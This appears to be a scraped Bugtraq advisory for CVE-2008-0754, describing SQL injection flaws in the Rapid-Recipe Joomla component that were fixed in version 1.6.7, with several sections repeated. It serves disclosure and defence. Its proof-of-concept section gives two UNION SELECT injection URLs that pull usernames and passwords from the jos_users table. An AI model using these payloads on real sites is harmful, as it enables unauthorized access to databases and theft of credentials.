Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
BID:27724
Info
Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27724 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0754 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | breaker_unit is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Rapid-Source Rapid-Recipe 0 |
| Not Vulnerable: |
Rapid-Source Rapid-Recipe 1.6.7 |
Discussion
Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
Rapid-Recipe is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Rapid-Recipe is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?option=com_rapidrecipe&page=showuser&user_id=-1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,20--
http://www.example.com/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20--
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?option=com_rapidrecipe&page=showuser&user_id=-1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,20--
http://www.example.com/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20--
Solution / Fix
Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
Solution:
The vendor has released a fix to address this issue. Please see the references for more information.
Solution:
The vendor has released a fix to address this issue. Please see the references for more information.
References
Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities
References:
References:
- Rapid-Recipe Homepage (Rapid-Source)
- Security Release Rapid Recipe 1.6.7 (Rapid-Source)